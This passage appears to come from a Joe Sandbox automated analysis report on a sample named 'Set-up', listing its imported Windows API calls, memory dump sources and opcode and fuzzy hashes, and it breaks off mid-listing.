                                      • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 0052D60C
                                      • QueryPerformanceFrequency.KERNEL32(00C49070), ref: 0052D643
                                      • WSACleanup.WS2_32 ref: 0052D67C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
                                      • String ID: if_nametoindex$iphlpapi.dll
                                      • API String ID: 3452087986-3097795196
                                      • Opcode ID: 74ba48660ba2219203e9521aad627a0ade540451195be0be1ef7af8c0a72decd
                                      • Instruction ID: 1cf659e4b6c3eb24dead997b13af6207a9c715eb628f1eb47c76258b7479357e
                                      • Opcode Fuzzy Hash: 74ba48660ba2219203e9521aad627a0ade540451195be0be1ef7af8c0a72decd
                                      • Instruction Fuzzy Hash: 8E01D4A4E003515BE7117B78BC1F7AA3EB4BF67304F440568E849C52D2F778C488C262
                                      APIs
                                      • htonl.WS2_32(7F000001), ref: 005C4A21
                                      • gethostname.WS2_32(00000000,00000040), ref: 005C4AA4
                                      • WSAGetLastError.WS2_32 ref: 005C4AB3
                                      • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 005C4B3F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ErrorLastgethostnamehtonlstrchr
                                      • String ID:
                                      • API String ID: 655544046-0
                                      • Opcode ID: 4a6bfcac358369caf24794643c8eba6fa1d608e3f8b0700233ea02c2afb7f4c1
                                      • Instruction ID: 13fb574dbcd0258905b597d180fc25987db03411eb3c24d67d03288ea2a7b62d
                                      • Opcode Fuzzy Hash: 4a6bfcac358369caf24794643c8eba6fa1d608e3f8b0700233ea02c2afb7f4c1
                                      • Instruction Fuzzy Hash: 7A519C706047018FEB309BA5DD59F277EE4BF41319F14082DE98A86691E775EC44CF52
                                      APIs
                                      • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,009BFCED), ref: 009BFC18
                                      • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,009BFCED), ref: 009BFC34
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,009BFCED), ref: 009BFC9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: calloc$free
                                      • String ID:
                                      • API String ID: 171065143-3916222277
                                      • Opcode ID: 7cde8a150e4ce0c18be2e0c4f2a03f5ef0ff62ed009f263a67bfd2d9a1f5c95d
                                      • Instruction ID: b0986c0015f8ae27692bfb7843ba59bdebe8a07ad851c57335ace02430fad2d5
                                      • Opcode Fuzzy Hash: 7cde8a150e4ce0c18be2e0c4f2a03f5ef0ff62ed009f263a67bfd2d9a1f5c95d
                                      • Instruction Fuzzy Hash: EB1191B14007058FCB20DF28C99465ABBE0FF59324F158B2CD8D597391D730D945CB92
                                      APIs
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: malloc$memcpystrlen
                                      • String ID:
                                      • API String ID: 3553820921-0
                                      • Opcode ID: fc031932d97d00d7527062c716a9526931d101494db973557205dc2edf84581f
                                      • Instruction ID: a2a00d31c639295169372e503af55650c6498ebb5ef5485c28d44afe51f49636
                                      • Opcode Fuzzy Hash: fc031932d97d00d7527062c716a9526931d101494db973557205dc2edf84581f
                                      • Instruction Fuzzy Hash: BB3146799047258FDB10DF68D98079EBBF1FB4A300F04896DDA4997311D731A945CF82
                                      APIs
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: malloc$memcpystrlen
                                      • String ID:
                                      • API String ID: 3553820921-0
                                      • Opcode ID: 59f47040d8ed8e83c5a58d13ad0ffec0f5ffb5aac4e2ac4eedcc0259d892d211
                                      • Instruction ID: 8caece9113cbca181779d3b6464efb61fc8c18037686500b315283aa8b839983
                                      • Opcode Fuzzy Hash: 59f47040d8ed8e83c5a58d13ad0ffec0f5ffb5aac4e2ac4eedcc0259d892d211
                                      • Instruction Fuzzy Hash: 2B21E0B9904625CBDB14EF68D8807AEBBF0FB89300B15896DD949A7310E731A941CF82
                                      APIs
                                      • AcquireSRWLockExclusive.KERNEL32(00C49044,0051208F), ref: 00513AB5
                                      • ReleaseSRWLockExclusive.KERNEL32(00C49044,00C49044,0051208F), ref: 00513AD0
                                      • ReleaseSRWLockExclusive.KERNEL32(00C49044), ref: 00513B02
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ExclusiveLock$Release$Acquire
                                      • String ID:
                                      • API String ID: 1021914862-0
                                      • Opcode ID: b0fbc7bda83529c6111789f76e9c082b87d18f961d83247a70d421c3979e7dfd
                                      • Instruction ID: f6b9c9571e22d75999f8b0b9ff21b34224c22b8728a1be5935cda4e4e6dcbfce
                                      • Opcode Fuzzy Hash: b0fbc7bda83529c6111789f76e9c082b87d18f961d83247a70d421c3979e7dfd
                                      • Instruction Fuzzy Hash: 81E0B6686001379E9B207B64AC5778E3AA1FF4A748B980460B504D11A2EE7D98445A63
                                      APIs
                                      • closesocket.WS2_32(?), ref: 005178BB
                                        • Part of subcall function 005172A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,000003FF), ref: 005172F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: closesocketfwrite
                                      • String ID: FD %s:%d sclose(%d)
                                      • API String ID: 1967222983-3116021458
                                      • Opcode ID: eec32ea4be02e2557ac67a65e140d5c36ed56720e28dbdf6fd4cffb4d540feb8
                                      • Instruction ID: 502f74900f880cfea77e64c642bacd0b71adcce0c3dc78f7453dc8ac28b1fa14
                                      • Opcode Fuzzy Hash: eec32ea4be02e2557ac67a65e140d5c36ed56720e28dbdf6fd4cffb4d540feb8
                                      • Instruction Fuzzy Hash: 65D05E36E096217B96206A9CBC48D9F7FB8EECAF20B090858F94067201D2349C5187F2
                                      APIs
                                      • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,009C066F), ref: 009C05D9
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,009C066F), ref: 009C05FC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _errnorealloc
                                      • String ID:
                                      • API String ID: 3650671883-0
                                      • Opcode ID: 43ac2f0923d610bc69d37e04dcbc38cc5f1d1f0381aec713d8a036049a1e2fb5
                                      • Instruction ID: 0942aad049753d085234ff6f5585a406b5528baf8021e2e7dc5ed002a2438f00
                                      • Opcode Fuzzy Hash: 43ac2f0923d610bc69d37e04dcbc38cc5f1d1f0381aec713d8a036049a1e2fb5
                                      • Instruction Fuzzy Hash: 25F062B1900651CF8B109F29C980B59BAD4BB85324F69475AF424CB295E734C881DF93
                                      APIs
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,0068D471,00000050,crypto/bio/bio_lib.c,00000053,?,?,?,0068D52B,00000000,00511A70,006948ED,00B5799C), ref: 006ECA8C
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000000,00511A70), ref: 006ECA9E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: mallocmemset
                                      • String ID:
                                      • API String ID: 2882185209-0
                                      • Opcode ID: c8940e142fd512155175e19ec1dde9f2c17d86863b2ec57ebf25d879ac932ec3
                                      • Instruction ID: fa29e8adca7a059ea2a5e32b53cdf3114dd4cdfaf807291e911543517a4b018a
                                      • Opcode Fuzzy Hash: c8940e142fd512155175e19ec1dde9f2c17d86863b2ec57ebf25d879ac932ec3
                                      • Instruction Fuzzy Hash: B2012D967023D127E620E66E7C85F5B2B4EDBD1734F1C0438FD04D2342D655DC058672
                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,009BB371), ref: 009BB9F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: f4e6eccd86f7ae8d32db7c426d825e7b9913dc1f59ab9054fffcb6c29e1c8df0
                                      • Instruction ID: ae845e0b71208fdce9a743f7b80f3d6d9b7e1e0ff5c31607e0c97cb081bd9b6a
                                      • Opcode Fuzzy Hash: f4e6eccd86f7ae8d32db7c426d825e7b9913dc1f59ab9054fffcb6c29e1c8df0
                                      • Instruction Fuzzy Hash: 6B0146B0A042008BCB04BF78C6C266AB7E4AF45324F554CA9E881CB34ADB74D890CB82
                                      APIs
                                      • getsockname.WS2_32(?,?,00000080), ref: 005DAFD0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID:
                                      • API String ID: 3358416759-0
                                      • Opcode ID: 767358bfb7290b499015fa0719059f9009b3fd4531518e2914978deda16dadd8
                                      • Instruction ID: df4e35762d1103a3ee5af1de6fd4f91c4d6990fcdb4c60d83e8ba9685aff6dcf
                                      • Opcode Fuzzy Hash: 767358bfb7290b499015fa0719059f9009b3fd4531518e2914978deda16dadd8
                                      • Instruction Fuzzy Hash: 4B119670808785D6EB268F1CD8067E6B7F4FFD0329F10861AE99942150F73259C5CBC2
                                      APIs
                                      • send.WS2_32(?,?,?,00000000), ref: 005DA97E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID:
                                      • API String ID: 2809346765-0
                                      • Opcode ID: 71fe71dd310c857bc856ff63812ab4978363334d314b515b8e53285b25ec9839
                                      • Instruction ID: 58670855520a1542e1998592f73917916e71f21b8136c62b319334b9676673eb
                                      • Opcode Fuzzy Hash: 71fe71dd310c857bc856ff63812ab4978363334d314b515b8e53285b25ec9839
                                      • Instruction Fuzzy Hash: E101A271B00710AFC7248F29DC45B5BBBA5FF84720F0A825AFA982B361C331AC148BD1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
